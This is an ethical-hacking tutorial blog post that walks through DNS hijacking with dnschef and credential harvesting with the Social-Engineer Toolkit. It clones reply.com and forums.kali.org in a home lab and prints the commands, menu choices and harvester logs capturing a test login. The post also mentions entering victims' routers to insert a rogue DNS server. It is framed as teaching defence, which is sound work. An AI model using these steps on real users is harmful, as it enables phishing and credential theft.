Ethical hacking how to hack through DNS hijacking and credential harvesting requires a basic understanding of how DNS works.
Below I will provide a basic introduction to this concept.
DNS Basics
DNS (Domain Name System) provides a mapping between a human readable domain name like reply.com to an IP address. Imagine having to advertise your business or browse to sites using IP addresses. It would be a painful experience using IPv4 addressing, but with IPv6 it would be near unusable. DNS resolution provides essential functionality for the Internet to work.
Your device (desktop, laptop, tablet, phone etc.) will all have DNS servers configured. For example Google’s public DNS servers are 8.8.8.8 and 8.8.4.4.
kali@kali:~$ nslookup> server 8.8.8.8
Default server: 8.8.8.8
Address: 8.8.8.8#53> reply.com
Server: 8.8.8.8
Address: 8.8.8.8#53Non-authoritative answer:
Name: reply.com
Address: 45.60.1.11
Name: reply.com
Address: 45.60.5.11“nslookup” is a tool to test DNS resolution. If you don’t provide a DNS “server” it will use your system DNS settings but you can override it using the “server” command. I’m configuring it to use 8.8.8.8 which is Google’s primary public DNS server. I then typed in “reply.com” which resolved to the IPv4 address 45.60.5.1.11. The IPv4 address will be used to route your request from your device to the web server hosting the Reply website. I’m simplifying the explanation here but at a basic level this is what is happening.
Now here is the problem…
What if it were possible to somehow hijack the client’s DNS request. So instead of the official DNS server responding that 45.60.5.11 is the IP address of the web server hosting the Reply site but rather 192.168.1.2 which is the address of my Kali server on my LAN. That’s a real problem!
My internal IP address of my Kali server isn’t publicly routable but that doesn’t mean you couldn’t make it available over the Internet using a DMZ, cloud instance, VPN etc. For the purpose of this tutorial and to just demonstrate the technique I’m going to use my local Kali server.
If you were somehow able to gain access to the victim’s router you could include your attack DNS as the first DNS server in the list. That would mean provided it was up it would be queried first, then the real DNS servers. The victim would actually be none the wiser that an additional DNS server had been added and even if they saw it would they even question it.
Think of all the home routers which actually have the login credentials for the router on the router itself! What if you were able to gain access to a victim’s device using an exploit discussed in my other article, “Ethical Hacking (Part 7): Metasploit Penetration Testing Framework”. There are many ways this can be done but I’m just giving you some food for thought.
Preparation
My Kali linux instance is running on 192.168.1.2 and my victim device is running on 192.168.1.1. I’ve updated the DNS settings on the victim device to have 192.168.1.2 in the top of the DNS server list in the TCP/IP settings. If your victim’s device is using DHCP you could also make this change on the DHCP server (probably the router) which will have the same effect. In terms of this tutorial I want to demonstrate how prepending and swapping to an attacker DNS server is seamless. My victim device is still functioning fine even though 192.168.1.2 is not responding yet. My requests will try 192.168.1.2 first and then that fails which it will at the moment it will just try the next DNS server on the list. As the victim it is not obvious that any change has happened.
Hijacking DNS
We are going to use a utility called “dnschef” which is bundled with Kali linux.
kali@kali:~$ dnschef --help
usage: dnschef [options]:
_ _ __
| | version 0.4 | | / _|
__| |_ __ ___ ___| |__ ___| |_
/ _` | '_ / __|/ __| '_ / _ _|
| (_| | | | __ (__| | | | __/ |
__,_|_| |_|___/___|_| |_|___|_|
iphelix@thesprawl.orgDNSChef is a highly configurable DNS Proxy for Penetration Testers and Malware
Analysts. It is capable of fine configuration of which DNS replies to modify
or to simply proxy with real responses. In order to take advantage of the tool
you must either manually configure or poison DNS server entry to point to
DNSChef. The tool requires root privileges to run on privileged ports.optional arguments:
-h, --help show this help message and exit
--fakedomains thesprawl.org,google.com
A comma separated list of domain names which will be
resolved to FAKE values specified in the the above
parameters. All other domain names will be resolved to
their true values.
--truedomains thesprawl.org,google.com
A comma separated list of domain names which will be
resolved to their TRUE values. All other domain names
will be resolved to fake values specified in the above
parameters.Fake DNS records::
--fakeip 192.0.2.1 IP address to use for matching DNS queries. If you use
this parameter without specifying domain names, then
all 'A' queries will be spoofed. Consider using --file
argument if you need to define more than one IP
address.
--fakeipv6 2001:db8::1
IPv6 address to use for matching DNS queries. If you
use this parameter without specifying domain names,
then all 'AAAA' queries will be spoofed. Consider
using --file argument if you need to define more than
one IPv6 address.
--fakemail mail.fake.com
MX name to use for matching DNS queries. If you use
this parameter without specifying domain names, then
all 'MX' queries will be spoofed. Consider using
--file argument if you need to define more than one MX
record.
--fakealias www.fake.com
CNAME name to use for matching DNS queries. If you use
this parameter without specifying domain names, then
all 'CNAME' queries will be spoofed. Consider using
--file argument if you need to define more than one
CNAME record.
--fakens ns.fake.com NS name to use for matching DNS queries. If you use
this parameter without specifying domain names, then
all 'NS' queries will be spoofed. Consider using
--file argument if you need to define more than one NS
record.
--file FILE Specify a file containing a list of DOMAIN=IP pairs
(one pair per line) used for DNS responses. For
example: google.com=1.1.1.1 will force all queries to
'google.com' to be resolved to '1.1.1.1'. IPv6
addresses will be automatically detected. You can be
even more specific by combining --file with other
arguments. However, data obtained from the file will
take precedence over others.Optional runtime parameters.:
--logfile FILE Specify a log file to record all activity
--nameservers 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
A comma separated list of alternative DNS servers to
use with proxied requests. Nameservers can have either
IP or IP#PORT format. A randomly selected server from
the list will be used for proxy requests when provided
with multiple servers. By default, the tool uses
Google's public DNS server 8.8.8.8 when running in
IPv4 mode and 2001:4860:4860::8888 when running in
IPv6 mode.
-i 127.0.0.1 or ::1, --interface 127.0.0.1 or ::1
Define an interface to use for the DNS listener. By
default, the tool uses 127.0.0.1 for IPv4 mode and ::1
for IPv6 mode.
-t, --tcp Use TCP DNS proxy instead of the default UDP.
-6, --ipv6 Run in IPv6 mode.
-p 53, --port 53 Port number to listen for DNS requests.
-q, --quiet Don't show headers.There are a load of configuration options there but the objective for this tutorial is simple. We want to hijack the DNS when going browsing too reply.com.
root@kali:~# dnschef --fakeip=192.168.1.2 --fakedomains=reply.com --interface=0.0.0.0
_ _ __
| | version 0.4 | | / _|
__| |_ __ ___ ___| |__ ___| |_
/ _` | '_ / __|/ __| '_ / _ _|
| (_| | | | __ (__| | | | __/ |
__,_|_| |_|___/___|_| |_|___|_|
iphelix@thesprawl.org(16:49:36) [*] DNSChef started on interface: 0.0.0.0
(16:49:36) [*] Using the following nameservers: 8.8.8.8
(16:49:36) [*] Cooking A replies to point to 192.168.1.2 matching: reply.comHas it worked?
I went to my victim machine and ran an “nslookup”.
% nslookup reply.com
Server: 192.168.1.2
Address: 192.168.1.2#53Name: reply.com
Address: 192.168.1.2% nslookup www.reply.com
Server: 192.168.1.2
Address: 192.168.1.2#53Name: www.reply.com
Address: 192.168.1.2Can you see my victim machine now thinks, “reply.com” resolves to 192.168.1.2 instead of 45.60.5.1.11. I mean that’s pretty disastrous.
You may be thinking, “so what?”. There is no web server running so what difference does it make if a victim browses to a web site which won’t respond because it doesn’t exist. You would be right and that’s why we’ll look at “setoolkit” next.
The Social-Engineer Toolkit (SET) — “setoolkit”
This is an incredibly powerful tool with loads of functionality. I encourage you to explore and see all it has to offer. For the purpose of this tutorial I’m going to one specific part and that is to clone a website to harvest credentials.
If this is the first time you are running “setoolkit” it will ask you to accept a disclaimer to say you are not going to use it for anything illegal.
root@kali:~# setoolkit. ..
MMMMMNMNMMMM=
.DMM. .MM$
.MM. MM,.
MN. MM.
.M. MM
.M ..................... NM
MM .8888888888888888888. M7
.M 88888888888888888888. ,M
MM ..888.MMMMM . .M.
MM 888.MMMMMMMMMMM M
MM 888.MMMMMMMMMMM. M
MM 888. NMMMM. .M
M. 888.MMMMMMMMMMM. ZM
NM. 888.MMMMMMMMMMM M:
.M+ ..... MM.
.MM. .MD
MM . .MM
$MM .MM.
,MM? .MMM
,MMMMMMMMMMM
https://www.trustedsec.com[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 8.0.3
Codename: 'Maverick'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.The Social-Engineer Toolkit is a product of TrustedSec.Visit: https://www.trustedsec.comIt's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!Select from the menu: 1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About99) Exit the Social-Engineer Toolkitset>Select “1” for “Social-Engineering Attacks”.
set> 1Select from the menu: 1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules99) Return back to the main menu.set>Then “2” for “Website Attack Vectors”.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method99) Return to Main Menuset:webattack> Select “3” or “Credential Harvester Attack Method”.
set:webattack> 3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import99) Return to Webattack Menuset:webattack>Select “2” for “Site Cloner”.
Please note that “settoolkit” will run its own web server. If you have Apache or NGINX running it will ask you if you want to stop the service (which you do for this to work). See highlighted points below in bold.
set:webattack> 2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
-------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---T
he way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really
important:If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.2]:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://reply.com[*] Cloning the website: https://reply.com
[*] This could take a little bit...The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
Stopping apache2 (via systemctl): apache2.service.
Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.Within seconds the Reply site has been cloned. If I open “http://192.168.1.2”, I can see the Reply site locally and the site looks exactly the same. The “setoolkit” logs look like this.
192.168.1.1 - - [18/Oct/2020 22:08:58] "GET / HTTP/1.1" 200 -
192.168.1.1 - - [18/Oct/2020 22:08:58] "GET /index.html HTTP/1.1" 200 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /style%20library/scripts/mtiFontTrackingCode.js HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340102 HTTP/1.1" 404 -
[*] WE GOT A HIT! Printing the output:
PARAM: {"Pattern":"[3,1,1,1]","Cycles":4,"Language":2,"Tags":[],"TagsInOr":true,"Sites":[1],"SortFields":["REUHomeOrderDate","REUValidityStartDate","Created"],"IsAscending":[false,false,false],"IsInHome":true,"IsInHomeSites":false,"TemplateB1":"1Block","TemplateB2":"2Block","TemplateB3":"3Block","PagingInfo1":"Paged=TRUE
PARAM: p_REUHomeOrderDate=20140603 22:00:00
PARAM: p_REUValidityStartDate=20140501 07:00:00
PARAM: p_Created=20140131 14:17:24
PARAM: p_ID=5672","PagingInfo2":"","PagingInfo3":"Paged=TRUE
PARAM: p_REUHomeOrderDate=20140825 22:00:00
PARAM: p_REUValidityStartDate=20140825 22:00:00
PARAM: p_Created=20140826 09:04:38
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340103 HTTP/1.1" 404 -
PARAM: p_ID=6728","HasMoreResults":true,"WidgetListName":"Contents","PageNumber":2,"PageUrl":"https://www.reply.com/en/SitePages/HomePage.aspx","CachePageUrl":"/en/sitepages/homepage.aspx","IsCacheActive":true,"HasFilters":false,"CacheAllWidgets":true,"IsPublicZone":true,"IsPast":false,"Title":null,"ExcludeId":[15902,20899,19155,20793,20670,20515,19773,20373,19941,19600,19258,19847,19764,19230,19314,19315,19503,19373,19081,19172,19191,18863,19162,18866,18728,18977,18687,18724,18134,17104,18654,18373,18462,18470,18231,18276,18122,17864,18206,17546,17138,16705,17153,17049,16532,15619,16618,16298,16180,16418,16272,14810,15043,13762,16279,15958,14584,14685,14194,14504,14395,13339,11709,11702,13173,11185,10736,11606,13646,10316,11577],"DateFrom":null,"DateTo":null,"Typologies":null,"PageWidgetTemplates":[[5507,15],[5516,4],[5486,4],[6171,3],[5483,3],[5478,3],[2309,4],[5998,3],[6172,3],[6203,3],[5875,3],[5890,4],[2117,3],[6405,16],[5604,3],[6196,5],[2449,4],[5749,3],[5926,3],[5956,4],[5710,3],[6019,3],[1246,4],[5794,3],[5698,3],[5716,3],[1139,4],[5941,13],[5983,4],[1044,4],[5669,4],[6142,9],[6232,3],[5995,4],[5672,4],[2116,3],[6412,3],[5475,3],[5947,4],[6495,4],[5734,4],[9187,3],[7900,4],[8464,4],[1943,3],[10015,3],[6163,4]],"Skip":0,"Topic":null,"ExtraConditions":null,"ForcedTemplateID":-1,"FirstForcedTemplateID":-1}
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.192.168.1.1 - - [18/Oct/2020 22:09:00] "POST /_layouts/15/reply.replyeu.wcm/getwidgetsasync.ashx HTTP/1.1" 302 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/menuhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2%2F&ParentIDList=76,43&_=1603055340105 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/menuhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2%2F&Mode=descendants&ParentIDList=2,8,14,21,25,29,45,34,37&_=1603055340104 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340106 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/userhandler.ashx?_=1603055340107 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_layouts/15/reply.replyeu.wcm/cookiebannerhandler.ashx?CurrentUrl=http%3A%2F%2F192.168.1.2%2F&_=1603055340108 HTTP/1.1" 404 -
192.168.1.1 - - [18/Oct/2020 22:09:00] "GET /_Incapsula_Resource?SWKMTFSR=1&e=0.5164617984924778 HTTP/1.1" 404 -And in my browser it looks like this…
An absolute exact match.
Now if I make sure “dnschef” is running for “reply.com” in one terminal window and “settoolkit” is still running in another terminal window, if I browse to “www.reply.com” or “reply.com” on the victim machine the site will look exactly the same. The only way you can tell the difference is the site is using HTTP instead of SSL. If you look next to the browser URL it says “Not Secure” and there is no lock. This should be a lesson learnt that you should always browse using HTTPS (SSL) instead of HTTP and you should see a lock in the browser next to the URL.
If you have any problems make sure you clear the cache in your browser and close all browser windows and re-open them. You will need to make sure you are not retrieving a cached version in the browser.
This is good…
This is bad…
So all I have done is clone the website within seconds and although that is impressive, no credentials were harvested.
An important message when cloning the site with “setoolkit” was this.
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.Let’s try and find a site with a login form on the landing page to try this on.
I’m going to use, “https://forums.kali.org” as it will be a nice example. It has a username and password form on the landing page so we are good to go.
In one Kali linux terminal window I start “dnschef”.
root@kali:~# dnschef --fakeip=192.168.1.2 --fakedomains=kali.org --interface=0.0.0.0In another Kali linux terminal window I clone the site with “setoolkit”.
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.2]:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://forums.kali.org[*] Cloning the website: https://forums.kali.org
[*] This could take a little bit...The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:I check on my victim machine and DNS for forums.kali.org is resolving to 192.168.1.2.
% nslookup forums.kali.org
Server: 192.168.1.2
Address: 192.168.1.2#53Name: forums.kali.org
Address: 192.168.1.2Now this is quite important. We need to make sure that the victim browser does not have the original site cached. Clear the cache and close your browser windows to be sure. When you have done that open your browser and open “forums.kali.org”. We’ll know it has worked because it will show the connection will be using HTTP instead of HTTPS and there will be a message saying “Not Secure”.
In the username and password fields on the page, I typed in “testuser” for the username and “testpass” for the password. As we aren’t really hitting the Kali forum the login will fail but we’ll see the login details in the “setoolkit” logs.
192.168.1.1 - - [18/Oct/2020 22:40:02] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: vb_login_username=testuser
POSSIBLE USERNAME FIELD FOUND: vb_login_password=
POSSIBLE PASSWORD FIELD FOUND: vb_login_password=
POSSIBLE USERNAME FIELD FOUND: vb_login_password_hint=testpass
POSSIBLE PASSWORD FIELD FOUND: vb_login_password_hint=testpass
PARAM: s=301f0571702614d88e1b330ebaa0751d
PARAM: securitytoken=guest
POSSIBLE USERNAME FIELD FOUND: do=login
POSSIBLE USERNAME FIELD FOUND: vb_login_md5password=
POSSIBLE PASSWORD FIELD FOUND: vb_login_md5password=
POSSIBLE USERNAME FIELD FOUND: vb_login_md5password_utf=
POSSIBLE PASSWORD FIELD FOUND: vb_login_md5password_utf=
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.192.168.1.1 - - [18/Oct/2020 22:40:21] "POST /login.php?s=301f0571702614d88e1b330ebaa0751d&do=login HTTP/1.1" 302 -As this stage you can stop “dnschef” and “setoolkit” and the user victim will undoubtedly refresh. This will mean our DNS responder will not respond they will hit the real site and they will be none the wiser.
I know this must seem pretty crazy but it just goes to show how careful you need to be using public Internet access or even browsing to malicious sites by mistake. I know everyone gets super excited when you find free Wifi when you are out but just ask yourself can you trust it? If their Wifi sends you bad DNS servers you are pretty much done for. If what if they haven’t secured their router properly and a hacker adds bad DNS servers.
It’s a good idea to have a decent virus scanner with web security to help you protect against this. It is really easy to fall into this trap so be careful.
I’m not showing you this you to carry out these attacks but more so to awaken you to what you are defending against and how to take the necessarily precautions to be as safe as possible online.
This is the essence of ethical hacking: to understand vulnerabilities so that you can protect your network against them!